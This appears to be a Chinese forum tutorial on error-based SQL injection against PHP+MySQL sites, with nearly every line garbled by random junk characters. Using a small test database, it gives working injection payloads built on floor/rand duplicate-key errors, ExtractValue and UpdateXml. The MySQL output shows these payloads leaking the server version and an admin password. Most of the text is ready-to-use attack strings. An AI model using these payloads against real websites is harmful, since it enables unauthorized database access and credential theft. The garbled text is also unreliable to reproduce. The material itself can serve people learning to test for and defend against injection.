放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
% {' O1 H2 E- [( ] s实际测试环境:
( i" @* t1 \8 x2 G$ [0 x5 _0 I4 m7 G* H: b, F6 V9 X- u
* r) R0 g* e3 |% |8 l
mysql> show tables;1 }" V1 r' s2 x, m: K' _5 v# w+ Y6 y
+----------------+
9 O6 @8 a" m& o9 a1 q/ ]7 n| Tables_in_test |" V5 _9 w0 }- a$ w# n& w
+----------------+
# S& s5 D2 m0 t4 I7 r| admin |5 [4 L& M8 W: S
| article |" h% k* k' Q. p
+----------------+
- ?4 O: _3 S2 z& M7 I# ?. ]
" T l9 U: \" o+ p$ C k. y9 j
; T8 w1 L2 B. [+ C6 H/ r6 W9 { % P z+ t! F8 h O2 u1 b: n
mysql> describe admin;
1 H7 j6 p8 P( `2 P# U+-------+------------------+------+-----+---------+----------------+
9 I1 o4 U8 d- ]& r3 W$ b| Field | Type | Null | Key | Default | Extra |
6 r) i- O1 }0 Q g6 a/ @+-------+------------------+------+-----+---------+----------------+
- n2 a+ {% [' n' \/ Q$ N6 K4 \( G$ m$ e| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 q/ n2 B3 q5 v" S4 X! w
| user | varchar(50) | NO | | NULL | |
/ v" t! |# ]7 Y! q% s( F5 ?| pass | varchar(50) | NO | | NULL | |
3 h& s7 O+ |1 p+ Z* Y% @! m+-------+------------------+------+-----+---------+----------------+
/ Z: W0 v9 U! p$ w- n, ]9 e; o* A 0 ^8 E- R' g) }, k& U4 c
6 x' S5 x/ t* u4 K * w% O& i8 I! R% _# g' z
mysql> describe article;
) v% j* |' a4 j, ~2 g5 {+---------+------------------+------+-----+---------+----------------+
. I4 E9 f+ X6 M7 T3 }. m( W) Y5 V/ l _ y| Field | Type | Null | Key | Default | Extra |' d4 Z' Q( L! ?; Y$ C2 e# y
+---------+------------------+------+-----+---------+----------------+
0 {- [! E* H. E2 Y! o+ || id | int(10) unsigned | NO | PRI | NULL | auto_increment |
/ H5 r9 k7 |( [| title | varchar(50) | NO | | NULL | |5 W& x1 t% R6 L o
| content | varchar(50) | NO | | NULL | |9 f$ V3 g- l2 J! V$ Q! F. C/ O! f
+---------+------------------+------+-----+---------+----------------+
' N5 M2 K. R d: O1、通过floor报错
+ s& {; a% B( @0 z" Z可以通过如下一些利用代码
) k( c0 b u& M3 H `! z, b& W7 U# @7 e6 x
8 C: I+ `1 u# l2 d
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
x8 ?- Y, g' R* f1 S$ {from information_schema.tables group by x)a);3 X! C1 D" W) U6 o( ^5 M' C
5 X, q8 I- t6 Y0 S$ A" s ' @8 b4 d/ [! Y
and (select count(*) from (select 1 union select null union select !1)x
+ s5 L# h* t; z( ~, c# M# kgroup by concat((select table_name from information_schema.tables limit 1),8 |$ q- H% W5 V* l c# @0 T
floor(rand(0)*2)));+ Z6 T6 f P0 }
举例如下: k* ]5 q/ N0 a& K! }
首先进行正常查询:- U3 a$ i" B' }; d7 v; ]
- C1 g7 m* C* A8 O; w4 B
mysql> select * from article where id = 1;
/ f1 n- V7 }0 k: b1 V2 m7 r C+----+-------+---------+
Z* } ^! C* }' V0 Q! V| id | title | content |/ G9 K5 i) T4 |* x2 s
+----+-------+---------+
8 l2 o; l) f% B7 A7 }| 1 | test | do it |8 E: i# P- u- Z# U9 B- M7 B
+----+-------+---------+
9 @/ k( u3 R2 N! {1 T+ e假如id输入存在注入的话,可以通过如下语句进行报错。+ n$ b4 ^/ j# {9 e3 Z
; X" Q ]3 g, B4 | ]
j) M0 D9 m% P$ E: `: T
mysql> select * from article where id = 1 and (select 1 from
! }8 n' I4 M) z" L' q(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);6 `& t' M! O/ U2 f
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
& ^: i2 R( B% h7 a) Z- Q6 s可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
0 \/ u. O6 D H H8 U4 Y例如我们需要查询管理员用户名和密码:! L* Y" [' b) }4 c% I- \! _+ W
Method1:
7 T& O% n3 ^/ d# r& Q, x' N 7 l, T7 ?+ x/ _* t1 B1 A3 A1 M/ I
; ]* x" W% {: H2 r) Vmysql> select * from article where id = 1 and (select 1 from j* `4 Q4 W$ K! o X
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x; M" }: s% B% x g) N3 C% k) W% w# f
from information_schema.tables group by x)a);7 s3 A/ L$ k7 @$ S6 j* i. j
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
# A1 R2 m5 _$ H. |$ Q7 LMethod2:6 A) ]" J. S; V y2 p6 u; r, f) u
$ ]* U; Q2 L* [
* f0 b" x9 v/ x3 p4 u( g
mysql> select * from article where id = 1 and (select count(*)
\! D, q2 z% a8 U# v5 L9 h- Dfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),1 |1 Z* L5 _% P' w9 D: P
floor(rand(0)*2)));
2 W) j2 R/ Q7 G: V) [, GERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'3 E" o! t% W$ K' I1 F
2、ExtractValue
$ T5 K0 j/ h" m2 U) a测试语句如下2 w# i% @6 V: v# M0 A; p
: t4 g* Y# g2 z; L
6 b) Q6 k9 ^/ {8 a( Y% q% D
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));% e4 x; G- L( H5 \2 ~ V
实际测试过程
8 ]9 b- D2 j# E - K/ o) T7 \: d7 H! `
% i7 m& G* H* P3 z' r% W- ], W. S
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,8 O* X# y: O( L. U
(select pass from admin limit 1)));--
0 @6 |7 Q6 n% e4 ?' MERROR 1105 (HY000): XPATH syntax error: '\admin888'' m( Y( V& c. U9 o
3、UpdateXml+ {) H) M2 }! p. A6 H
测试语句7 g) T) G ^8 V7 B& ~
0 `, [9 c" a: a& e# p
, q7 j1 _' |+ R- a5 H/ H% @and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
! Q# z; _ l3 {; f3 n3 u# L; |实际测试过程; v. d4 r9 b8 z5 b O: G
+ A- q: `8 F( `$ Y. _# J* X! t
+ ?( k. T- v9 U6 C" Cmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,* s. r* _" ~+ ]9 @
(select pass from admin limit 1),0x5e24),1));" ?7 e3 r' ?% g4 j4 ^
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'0 T f) n* I2 r% y2 |
All, thanks foreign guys.; y' x/ C8 o& {$ c4 n$ u- x. n
% M% k" @, A' f2 q) e" ?5 _% j# {
6 K9 s: E* ]* O9 D# O; \0 ?2 o |